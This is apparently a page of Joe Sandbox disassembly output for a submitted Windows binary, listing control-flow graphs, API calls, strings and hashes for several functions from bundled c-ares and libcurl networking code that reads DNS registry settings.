                                      control_flow_graph 1681 ccb180-ccb195 1682 ccb19b-ccb1a2 1681->1682 1683 ccb3e0-ccb3e7 1681->1683 1684 ccb1b0-ccb1b9 1682->1684 1684->1684 1685 ccb1bb-ccb1bd 1684->1685 1685->1683 1686 ccb1c3-ccb1d0 1685->1686 1688 ccb3db 1686->1688 1689 ccb1d6-ccb1f2 1686->1689 1688->1683 1690 ccb229-ccb22d 1689->1690 1691 ccb3e8-ccb417 1690->1691 1692 ccb233-ccb246 1690->1692 1700 ccb41d-ccb429 1691->1700 1701 ccb582-ccb589 1691->1701 1693 ccb248-ccb24b 1692->1693 1694 ccb260-ccb264 1692->1694 1695 ccb24d-ccb256 1693->1695 1696 ccb215-ccb223 1693->1696 1698 ccb269-ccb286 call ccaf30 1694->1698 1695->1698 1696->1690 1699 ccb315-ccb33c call f88b00 1696->1699 1709 ccb288-ccb2a3 call ccb060 1698->1709 1710 ccb2f0-ccb301 1698->1710 1712 ccb3bf-ccb3ca 1699->1712 1713 ccb342-ccb347 1699->1713 1704 ccb42b-ccb433 call ccb590 1700->1704 1705 ccb435-ccb44c call ccb590 1700->1705 1704->1705 1722 ccb44e-ccb456 call ccb590 1705->1722 1723 ccb458-ccb471 call ccb590 1705->1723 1729 ccb2a9-ccb2c7 getsockname call ccb020 1709->1729 1730 ccb200-ccb213 call ccb020 1709->1730 1710->1696 1726 ccb307-ccb310 1710->1726 1717 ccb3cc-ccb3d9 1712->1717 1719 ccb349-ccb358 1713->1719 1720 ccb384-ccb38f 1713->1720 1717->1683 1727 ccb360-ccb382 1719->1727 1720->1712 1728 ccb391-ccb3a5 1720->1728 1722->1723 1739 ccb48c-ccb4a7 1723->1739 1740 ccb473-ccb487 1723->1740 1726->1717 1727->1720 1727->1727 1735 ccb3b0-ccb3bd 1728->1735 1737 ccb2cc-ccb2dd 1729->1737 1730->1696 1735->1712 1735->1735 1737->1696 1741 ccb2e3 1737->1741 1742 ccb4a9-ccb4b1 call ccb660 1739->1742 1743 ccb4b3-ccb4cb call ccb660 1739->1743 1740->1701 1741->1726 1742->1743 1748 ccb4cd-ccb4d5 call ccb660 1743->1748 1749 ccb4d9-ccb4f5 call ccb660 1743->1749 1748->1749 1754 ccb50d-ccb52b call ccb770 * 2 1749->1754 1755 ccb4f7-ccb50b 1749->1755 1754->1701 1760 ccb52d-ccb531 1754->1760 1755->1701 1761 ccb580 1760->1761 1762 ccb533-ccb53b 1760->1762 1761->1701 1763 ccb53d-ccb547 1762->1763 1764 ccb578-ccb57e 1762->1764 1763->1764 1765 ccb549-ccb54d 1763->1765 1764->1701 1765->1764 1766 ccb54f-ccb558 1765->1766 1766->1764 1767 ccb55a-ccb576 call ccb870 * 2 1766->1767 1767->1701 1767->1764
                                      APIs
                                      • getsockname.WS2_32(-00000020,-00000020,?), ref: 00CCB2B7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: getsockname
                                      • String ID: ares__sortaddrinfo.c$cur != NULL
                                      • API String ID: 3358416759-2430778319
                                      • Opcode ID: e855819367c60a354cfb4c91ed2f6c2a4ec1ba7e67a3f55ec90ab53be3d5927d
                                      • Instruction ID: 9fc642760494d2f5c2979e60b6227deed5e72f7587ceefd4612b10e967bc6a0b
                                      • Opcode Fuzzy Hash: e855819367c60a354cfb4c91ed2f6c2a4ec1ba7e67a3f55ec90ab53be3d5927d
                                      • Instruction Fuzzy Hash: 8AC17D716043059FD718DFA4C882F6A77E5AF88314F08886CF8599B3A2DB35ED45DB81
                                      Function 00C16FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b7825216cc0431b25355376ba5e301d1796b1aa87f7ac469d37e6c5fc335cb4e
                                      • Instruction ID: a31a0e2d49e26ff475e6389225af752ebc41cab5ac1bec100ac8de0de0424239
                                      • Opcode Fuzzy Hash: b7825216cc0431b25355376ba5e301d1796b1aa87f7ac469d37e6c5fc335cb4e
                                      • Instruction Fuzzy Hash: 6F91E33060D3098BD7359A2988847FB72F5EBC6320F648B2CE8A9431E4D7759E81F681
                                      Function 00CCA8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                      Download Yara Rule
                                      APIs
                                      • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,00CB712E,?,?,?,00001001,00000000), ref: 00CCA90C
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: recvfrom
                                      • String ID:
                                      • API String ID: 846543921-0
                                      • Opcode ID: 81fac7e04a11ac21ef2fce685a94f9a2c9bc6388c6126832b01d2caa66ec0943
                                      • Instruction ID: a8589f79a2a0f2865e4b91c0b0b86119d32e7d9799c4fb5f713eaf2120b09215
                                      • Opcode Fuzzy Hash: 81fac7e04a11ac21ef2fce685a94f9a2c9bc6388c6126832b01d2caa66ec0943
                                      • Instruction Fuzzy Hash: CEF06D7510830CAFD2209E02DC89E6BBBEDEFC9758F05456DF958232118271AE11CAB2
                                      Function 00CBA440 Relevance: 44.8, APIs: 17, Strings: 8, Instructions: 1066registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00CBAA19
                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00CBAA4C
                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 00CBAA97
                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00CBAAE9
                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00CBAB30
                                      • RegCloseKey.KERNELBASE(?), ref: 00CBAB6A
                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 00CBAB82
                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 00CBAC46
                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 00CBAD0A
                                      • RegEnumKeyExA.KERNELBASE ref: 00CBAD8D
                                      • RegCloseKey.KERNELBASE(?), ref: 00CBADD9
                                      • RegEnumKeyExA.KERNELBASE ref: 00CBAE08
                                      • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 00CBAE2A
                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00CBAE54
                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00CBAF63
                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00CBAFB2
                                      • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 00CBB072
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: QueryValue$Open$CloseEnum
                                      • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                      • API String ID: 4217438148-1047472027
                                      • Opcode ID: 47a530f3d273dfcb017abad13d472770fa51a60eb115970f8cad839c90a3cdad
                                      • Instruction ID: d56600e50f94235f22a4f141138926a04296d5c58577e0d82520dfd075c95ca4
                                      • Opcode Fuzzy Hash: 47a530f3d273dfcb017abad13d472770fa51a60eb115970f8cad839c90a3cdad
                                      • Instruction Fuzzy Hash: A972BFB1604341AFE7209B24DC86BAB7BE8EF85700F14482CF9959B291E775EA44CB53
                                      Function 00C3A550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                      Download Yara Rule
                                      APIs
                                      • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00C3A832
                                      Strings
                                      • Could not set TCP_NODELAY: %s, xrefs: 00C3A871
                                      • Couldn't bind to '%s' with errno %d: %s, xrefs: 00C3AE1F
                                      • @, xrefs: 00C3AC42
                                      • cf-socket.c, xrefs: 00C3A5CD, 00C3A735
                                      • Bind to local port %d failed, trying next, xrefs: 00C3AFE5
                                      • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00C3AD0A
                                      • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00C3A6CE
                                      • Local port: %hu, xrefs: 00C3AF28
                                      • cf_socket_open() -> %d, fd=%d, xrefs: 00C3A796
                                      • @, xrefs: 00C3A8F4
                                      • Local Interface %s is ip %s using address family %i, xrefs: 00C3AE60
                                      • Name '%s' family %i resolved to '%s' family %i, xrefs: 00C3ADAC
                                      • Trying [%s]:%d..., xrefs: 00C3A689
                                      • Trying %s:%d..., xrefs: 00C3A7C2, 00C3A7DE
                                      • bind failed with errno %d: %s, xrefs: 00C3B080
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: setsockopt
                                      • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                      • API String ID: 3981526788-2373386790
                                      • Opcode ID: 06f08b63e57e22ff2b2665547f60d9a4654f92e2e5fcf6a4a39e02d6eb13e909
                                      • Instruction ID: 573ddce700fc40ecfac677c94da6a400f9e48c5d49461ebed6ab6ac6a11fb523
                                      • Opcode Fuzzy Hash: 06f08b63e57e22ff2b2665547f60d9a4654f92e2e5fcf6a4a39e02d6eb13e909
                                      • Instruction Fuzzy Hash: 1C620171518381ABE724CF24C886BABB7E4BF85304F044929F99897292E771E954CB93
                                      Function 00CC9740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743registryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 862 cc9740-cc975b 863 cc975d-cc9768 call cc78a0 862->863 864 cc9780-cc9782 862->864 872 cc976e-cc9770 863->872 873 cc99bb-cc99c0 863->873 866 cc9788-cc97a0 call f88e00 call cc78a0 864->866 867 cc9914-cc994e call f88b70 RegOpenKeyExA 864->867 866->873 877 cc97a6-cc97c5 866->877 875 cc995a-cc9992 RegQueryValueExA RegCloseKey call f88b98 867->875 876 cc9950-cc9955 867->876 872->877 878 cc9772-cc977e 872->878 879 cc9a0c-cc9a15 873->879 890 cc9997-cc99b5 call cc78a0 875->890 876->879 885 cc9827-cc9833 877->885 886 cc97c7-cc97e0 877->886 878->866 891 cc985f-cc9872 call cc5ca0 885->891 892 cc9835-cc985c call cbe2b0 * 2 885->892 888 cc97f6-cc9809 886->888 889 cc97e2-cc97f3 call f88b50 886->889 888->885 902 cc980b-cc9810 888->902 889->888 890->873 890->877 903 cc9878-cc987d call cc77b0 891->903 904 cc99f0 891->904 892->891 902->885 907 cc9812-cc9822 902->907 911 cc9882-cc9889 903->911 906 cc99f5-cc99fb call cc5d00 904->906 916 cc99fe-cc9a09 906->916 907->879 911->906 915 cc988f-cc989b call cb4fe0 911->915 915->904 920 cc98a1-cc98c3 call f88b50 call cc78a0 915->920 916->879 926 cc98c9-cc98db call cbe2d0 920->926 927 cc99c2-cc99ed call cbe2b0 * 2 920->927 926->927 931 cc98e1-cc98f0 call cbe2d0 926->931 927->904 931->927 938 cc98f6-cc9905 call cc63f0 931->938 942 cc990b-cc990f 938->942 943 cc9f66-cc9f7f call cc5d00 938->943 945 cc9a3f-cc9a5a call cc6740 call cc63f0 942->945 943->916 945->943 951 cc9a60-cc9a6e call cc6d60 945->951 954 cc9a1f-cc9a39 call cc6840 call cc63f0 951->954 955 cc9a70-cc9a94 call cc6200 call cc67e0 call cc6320 951->955 954->943 954->945 966 cc9a16-cc9a19 955->966 967 cc9a96-cc9ac6 call cbd120 955->967 966->954 969 cc9fc1 966->969 972 cc9ac8-cc9adb call cbd120 967->972 973 cc9ae1-cc9af7 call cbd190 967->973 971 cc9fc5-cc9ffd call cc5d00 call cbe2b0 * 2 969->971 971->916 972->954 972->973 973->954 981 cc9afd-cc9b09 call cb4fe0 973->981 981->969 987 cc9b0f-cc9b29 call cbe730 981->987 991 cc9b2f-cc9b3a call cc78a0 987->991 992 cc9f84-cc9f88 987->992 991->992 999 cc9b40-cc9b54 call cbe760 991->999 995 cc9f95-cc9f99 992->995 997 cc9f9b-cc9f9e 995->997 998 cc9fa0-cc9fb6 call cbebf0 * 2 995->998 997->969 997->998 1009 cc9fb7-cc9fbe 998->1009 1005 cc9f8a-cc9f92 999->1005 1006 cc9b5a-cc9b6e call cbe730 999->1006 1005->995 1012 cc9b8c-cc9b97 call cc63f0 1006->1012 1013 cc9b70-cca004 1006->1013 1009->969 1019 cc9b9d-cc9bbf call cc6740 call cc63f0 1012->1019 1020 cc9c9a-cc9cab call cbea00 1012->1020 1017 cca015-cca01d 1013->1017 1021 cca01f-cca022 1017->1021 1022 cca024-cca045 call cbebf0 * 2 1017->1022 1019->1020 1039 cc9bc5-cc9bda call cc6d60 1019->1039 1031 cc9f31-cc9f35 1020->1031 1032 cc9cb1-cc9ccd call cbea00 call cbe960 1020->1032 1021->971 1021->1022 1022->971 1034 cc9f37-cc9f3a 1031->1034 1035 cc9f40-cc9f61 call cbebf0 * 2 1031->1035 1050 cc9cfd-cc9d0e call cbe960 1032->1050 1051 cc9ccf 1032->1051 1034->954 1034->1035 1035->954 1039->1020 1049 cc9be0-cc9bf4 call cc6200 call cc67e0 1039->1049 1049->1020 1070 cc9bfa-cc9c0b call cc6320 1049->1070 1060 cc9d10 1050->1060 1061 cc9d53-cc9d55 1050->1061 1054 cc9cd1-cc9cec call cbe9f0 call cbe4a0 1051->1054 1071 cc9cee-cc9cfb call cbe9d0 1054->1071 1072 cc9d47-cc9d51 1054->1072 1065 cc9d12-cc9d2d call cbe9f0 call cbe4a0 1060->1065 1064 cc9e69-cc9e8e call cbea40 call cbe440 1061->1064 1090 cc9e94-cc9eaa call cbe3c0 1064->1090 1091 cc9e90-cc9e92 1064->1091 1087 cc9d2f-cc9d3c call cbe9d0 1065->1087 1088 cc9d5a-cc9d6f call cbe960 1065->1088 1081 cc9b75-cc9b86 call cbea00 1070->1081 1082 cc9c11-cc9c1c call cc7b70 1070->1082 1071->1050 1071->1054 1077 cc9dca-cc9ddb call cbe960 1072->1077 1100 cc9ddd-cc9ddf 1077->1100 1101 cc9e2e-cc9e36 1077->1101 1081->1012 1109 cc9f2d 1081->1109 1082->1012 1104 cc9c22-cc9c33 call cbe960 1082->1104 1087->1065 1112 cc9d3e-cc9d42 1087->1112 1115 cc9d71-cc9d73 1088->1115 1116 cc9dc2 1088->1116 1119 cca04a-cca04c 1090->1119 1120 cc9eb0-cc9eb1 1090->1120 1097 cc9eb3-cc9ec4 call cbe9c0 1091->1097 1097->954 1121 cc9eca-cc9ed0 1097->1121 1110 cc9e06-cc9e21 call cbe9f0 call cbe4a0 1100->1110 1106 cc9e3d-cc9e5b call cbebf0 * 2 1101->1106 1107 cc9e38-cc9e3b 1101->1107 1131 cc9c35 1104->1131 1132 cc9c66-cc9c75 call cc78a0 1104->1132 1117 cc9e5e-cc9e67 1106->1117 1107->1106 1107->1117 1109->1031 1146 cc9de1-cc9dee call cbec80 1110->1146 1147 cc9e23-cc9e2c call cbeac0 1110->1147 1112->1064 1126 cc9d9a-cc9db5 call cbe9f0 call cbe4a0 1115->1126 1116->1077 1117->1064 1117->1097 1124 cca04e-cca051 1119->1124 1125 cca057-cca070 call cbebf0 * 2 1119->1125 1120->1097 1130 cc9ee5-cc9ef2 call cbe9f0 1121->1130 1124->969 1124->1125 1125->1009 1159 cc9d75-cc9d82 call cbec80 1126->1159 1160 cc9db7-cc9dc0 call cbeac0 1126->1160 1130->954 1153 cc9ef8-cc9f0e call cbe440 1130->1153 1139 cc9c37-cc9c51 call cbe9f0 1131->1139 1149 cc9c7b-cc9c8f call cbe7c0 1132->1149 1150 cca011 1132->1150 1139->1012 1176 cc9c57-cc9c64 call cbe9d0 1139->1176 1164 cc9df1-cc9e04 call cbe960 1146->1164 1147->1164 1149->1012 1171 cc9c95-cca00e 1149->1171 1150->1017 1174 cc9f10-cc9f26 call cbe3c0 1153->1174 1175 cc9ed2-cc9edf call cbe9e0 1153->1175 1180 cc9d85-cc9d98 call cbe960 1159->1180 1160->1180 1164->1101 1164->1110 1171->1150 1174->1175 1189 cc9f28 1174->1189 1175->954 1175->1130 1176->1132 1176->1139 1180->1116 1180->1126 1189->969
                                      APIs
                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00CC9946
                                      • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00CC9974
                                      • RegCloseKey.KERNELBASE(?), ref: 00CC998B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                      • API String ID: 3677997916-4129964100
                                      • Opcode ID: 3d2520f71aee8dd58716ff13a71547aa62e4d909a6029702f93a1ffa4c42d3e1
                                      • Instruction ID: 792d9ff336c874b0d5e239df91d9a3bc2cebe681e1acfc502d8cc2854392f262
                                      • Opcode Fuzzy Hash: 3d2520f71aee8dd58716ff13a71547aa62e4d909a6029702f93a1ffa4c42d3e1
                                      • Instruction Fuzzy Hash: FD32B5B5904201ABEB11AB24EC4AF9B76E4EF54714F08443CF91A96263F731EE14E793
                                      Function 00C38B50 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 269networkCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
